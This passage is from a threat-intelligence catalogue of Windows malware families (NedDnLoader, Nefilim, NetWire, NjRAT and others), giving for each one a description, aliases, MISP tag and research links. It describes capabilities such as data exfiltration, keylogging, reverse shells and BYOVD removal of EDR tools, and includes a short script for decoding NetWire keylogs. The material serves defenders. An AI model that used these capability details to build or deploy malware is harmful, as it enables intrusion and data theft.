NedDnLoader is an HTTP(S) downloader that uses AES for C&C traffic encryption.

It sends detailed information about the victim’s environment, like computer name, user name, type and free disk space of all drives, and a list of currently running processes. It uses three typical parameter names for HTTP POST requests: ned, gl, hl. The usual payload downloaded with NedDnLoader is Torisma.

The internal DLL name of NedDnLoader is usually Dn.dll, Dn64.dll or DnDll.dll. It is deployed either as a standalone payload or within a trojanized MFC application project. It contains specific RTTI symbols like ".?AVCWininet_Protocol@@" or ".?AVCMFC_DLLApp@@".

The tag is: misp-galaxy:malpedia="NedDnLoader"

NedDnLoader is also known as:

Table 4106. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.telsy.com/lazarus-gate/

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

Nefilim

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is the removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected with RSA-2048.

The tag is: misp-galaxy:malpedia="Nefilim"

Nefilim is also known as:

  • Nephilim

Table 4107. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim

https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html

https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/

https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html

https://securelist.com/evolution-of-jsworm-ransomware/102428/

https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf

https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware

http://www.secureworks.com/research/threat-profiles/gold-mansard

https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry

https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/

https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html

https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Nemty

Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artifacts they had seen before in Gandcrab.

The tag is: misp-galaxy:malpedia="Nemty"

Nemty is also known as:

Table 4110. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty

https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/

https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md

https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html

https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/

https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://securelist.com/evolution-of-jsworm-ransomware/102428/

https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/

https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

http://www.secureworks.com/research/threat-profiles/gold-mansard

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw

https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/

https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/

https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/

Nerbian RAT

Proofpoint observed distribution of this RAT since late April 2022. It is written in Go and incorporates code from various open-source Git repositories.

The tag is: misp-galaxy:malpedia="Nerbian RAT"

Nerbian RAT is also known as:

Table 4111. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nerbian_rat

https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques

neshta

Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something."

The tag is: misp-galaxy:malpedia="neshta"

neshta is also known as:

Table 4112. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta

https://www.virusradar.com/en/Win32_Neshta.A/description

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest

https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html

NESTEGG

NESTEGG is a memory-only backdoor that can proxy commands to other infected systems using a custom routing scheme. It accepts commands to upload and download files, list and delete files, list and terminate processes, and start processes. NESTEGG also creates Windows Firewall rules that allow the backdoor to bind to a specified port number and accept inbound traffic.

The tag is: misp-galaxy:malpedia="NESTEGG"

NESTEGG is also known as:

Table 4113. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg

https://youtu.be/8hJyLkLHH8Q?t=1208

https://securelist.com/lazarus-under-the-hood/77908/

https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf

https://youtu.be/_kzFNQySEMw?t=789

https://content.fireeye.com/apt/rpt-apt38

NetDooka

A RAT written in .NET, delivered with a driver to protect it from deletion. Observed being dropped by PrivateLoader.

The tag is: misp-galaxy:malpedia="NetDooka"

NetDooka is also known as:

Table 4115. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netdooka

https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html

NetFlash

The tag is: misp-galaxy:malpedia="NetFlash"

NetFlash is also known as:

Table 4118. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netflash

https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/

NetKey

The tag is: misp-galaxy:malpedia="NetKey"

NetKey is also known as:

Table 4119. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey

https://twitter.com/kevinperlow/status/1156406115472760835

NetSpy

Freely available network reconnaissance tool.

The tag is: misp-galaxy:malpedia="NetSpy"

NetSpy is also known as:

Table 4121. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy

https://github.com/shmilylty/netspy

NetSupportManager RAT

Enigma Software notes that NetSupport Manager is a genuine application, which was first released about twenty years ago. The purpose of the NetSupport Manager tool is to enable users to receive remote technical support or provide remote computer assistance. However, cyber crooks have hijacked this useful application and misappropriated it to use it in their harmful campaigns. The name of the modified version of the NetSupport Manager has been labeled the NetSupport Manager RAT.

The tag is: misp-galaxy:malpedia="NetSupportManager RAT"

NetSupportManager RAT is also known as:

  • NetSupport

Table 4122. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat

https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html

https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising

https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/

https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/

https://www.trellix.com/about/newsroom/stories/research/new-techniques-of-fake-browser-updates/

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

https://asec.ahnlab.com/en/45312/

https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html

https://medium.com/walmartglobaltech/smartapesg-4605157a5b80

https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer

http://www.netsupportmanager.com/index.asp

https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html

NetWire RC

Netwire is a RAT. Its functionality seems focused on password stealing and keylogging, but it includes remote control capabilities as well.

Keylog files are stored on the infected machine in an obfuscated form. The decoding algorithm is:

def decode_netwire_keylog(buffer, num_read):  # buffer: bytearray holding the obfuscated keylog file
    for i in range(0, num_read):
        buffer[i] = ((buffer[i] - 0x24) ^ 0x9D) & 0xFF  # subtract 0x24, XOR with 0x9D, keep the low byte
    return buffer

The tag is: misp-galaxy:malpedia="NetWire RC"

NetWire RC is also known as:

  • NetWeird

  • NetWire

  • Recam

Table 4124. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire

https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/

https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA

https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf

https://lmntrix.com/lab/analysis-of-netwire-rat/

https://threatpost.com/ta2541-apt-rats-aviation/178422/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/

https://community.riskiq.com/article/24759ad2

https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data

https://www.theregister.com/2023/03/10/fbi_netwire_seizure/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/

https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/

https://news.drweb.ru/show/?i=13281&c=23

https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line

https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view

https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg

https://www.youtube.com/watch?v=TeQdZxP0RYY

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view

https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html

https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://news.sophos.com/en-us/2020/05/14/raticate/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html

https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728

https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers

https://www.circl.lu/pub/tr-23/

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/

https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers

Neutrino POS

The tag is: misp-galaxy:malpedia="Neutrino POS"

Neutrino POS is also known as:

Table 4127. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos

https://securelist.com/neutrino-modification-for-pos-terminals/78839/

Nexster Bot

The tag is: misp-galaxy:malpedia="Nexster Bot"

Nexster Bot is also known as:

Table 4134. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot

https://twitter.com/benkow_/status/789006720668405760

NGLite

According to Unit42, NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.

The tag is: misp-galaxy:malpedia="NGLite"

NGLite is also known as:

Table 4137. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nglite

https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/

https://us-cert.cisa.gov/ncas/alerts/aa21-336a

Nibiru

The tag is: misp-galaxy:malpedia="Nibiru"

Nibiru is also known as:

Table 4138. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nibiru

https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html

NimbleMamba

NimbleMamba is a new implant used by TA402/Molerats group as replacement of LastConn. It uses guardrails to ensure that victims are within the TA’s target region. It is written in C# and delivered as an obfuscated .NET executable. One seen obfuscator is SmartAssembly.

The tag is: misp-galaxy:malpedia="NimbleMamba "

NimbleMamba is also known as:

Table 4142. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimblemamba

https://thehackernews.com/2022/02/palestinian-hackers-using-new.html

https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage

Nimbo-C2 (Windows)

According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It’s written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).

The tag is: misp-galaxy:malpedia="Nimbo-C2 (Windows)"

Nimbo-C2 (Windows) is also known as:

Table 4143. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2

https://github.com/itaymigdal/Nimbo-C2

NimGrabber

Malware written in Nim, stealing data including discord tokens from browsers, exfiltrating the results via a Discord webhook.

The tag is: misp-galaxy:malpedia="NimGrabber"

NimGrabber is also known as:

Table 4144. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

Nimplant

Part of Mythic C2, written in Nim. Considered deprecated, as it is only compatible with Mythic 2.1.

The tag is: misp-galaxy:malpedia="Nimplant"

Nimplant is also known as:

Table 4145. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant

https://github.com/MythicAgents/nimplant

Nimrev

Backdoor written in Nim.

The tag is: misp-galaxy:malpedia="Nimrev"

Nimrev is also known as:

Table 4146. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

NimBlackout

According to its author, NimBlackout is an adaptation of the @Blackout project originally developed in C++ by @ZeroMemoryEx, which consists of removing AV/EDRs using the gmer (BYOVD) driver. The main reason for this project was to understand how BYOVD attacks work, and then to provide a valid PoC developed in Nim.

The tag is: misp-galaxy:malpedia="NimBlackout"

NimBlackout is also known as:

Table 4147. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nim_blackout

https://github.com/Helixo32/NimBlackout

NineRAT

The tag is: misp-galaxy:malpedia="NineRAT"

NineRAT is also known as:

Table 4148. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ninerat

https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/

NirCmd

NirCmd is a benign tool by NirSoft that provides various functionalities. Among these is, for example, the ability to start regedit as SYSTEM, which is sometimes abused for privilege escalation; other functionality can likewise be abused for malicious purposes. It is also frequently flagged by AV engines.

The tag is: misp-galaxy:malpedia="NirCmd"

NirCmd is also known as:

Table 4149. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nircmd

https://www.nirsoft.net/utils/nircmd.html

nitlove

The tag is: misp-galaxy:malpedia="nitlove"

nitlove is also known as:

Table 4150. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove

https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html

NixScare Stealer

The tag is: misp-galaxy:malpedia="NixScare Stealer"

NixScare Stealer is also known as:

Table 4154. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nixscare

https://twitter.com/3xp0rtblog/status/1302584919592501248

NjRAT

RedPacket Security describes NJRat as "a remote access trojan (RAT) that has capabilities to log keystrokes, access the victim’s camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim’s desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."

It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.

The tag is: misp-galaxy:malpedia="NjRAT"

NjRAT is also known as:

  • Bladabindi

  • Lime-Worm

Table 4155. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://attack.mitre.org/groups/G0096

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/

https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html

https://infosecwriteups.com/part1-static-code-analysis-of-the-rat-njrat-2f273408df43

https://www.4hou.com/posts/VoPM

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://blogs.360.cn/post/APT-C-44.html

https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf

https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/

http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/

https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://labs.k7computing.com/?p=21904

https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT

https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388

http://blogs.360.cn/post/analysis-of-apt-c-37.html

https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services

https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/

https://blog.morphisec.com/syk-crypter-discord

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf

https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://ti.360.net/blog/articles/analysis-of-apt-c-27/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks

https://blog.reversinglabs.com/blog/rats-in-the-library

https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware

https://forensicitguy.github.io/njrat-installed-from-msi/

https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html

https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://securelist.com/apt-trends-report-q2-2019/91897/

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/

https://intel471.com/blog/privateloader-malware

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt

https://blog.talosintelligence.com/2021/07/sidecopy.html

https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/

https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf

https://asec.ahnlab.com/1369

https://twitter.com/ESETresearch/status/1449132020613922828

https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

nmass malware

It is a .NET RAT with a hardcoded key.

The tag is: misp-galaxy:malpedia="nmass malware"

nmass malware is also known as:

Table 4156. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nmass

https://sebdraven.medium.com/a-net-rat-target-mongolia-9c1439c39bc2

Nocturnal Stealer

The tag is: misp-galaxy:malpedia="Nocturnal Stealer"

Nocturnal Stealer is also known as:

Table 4157. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

NodeStealer

The tag is: misp-galaxy:malpedia="NodeStealer"

NodeStealer is also known as:

Table 4158. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.node_stealer

https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/

Nokki

Nokki is a RAT-type malware which is believed to have evolved from Konni RAT. This malware has been tied to attacks containing politically motivated lures targeting Russian- and Cambodian-speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper, also known as APT37.

The tag is: misp-galaxy:malpedia="Nokki"

Nokki is also known as:

Table 4159. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

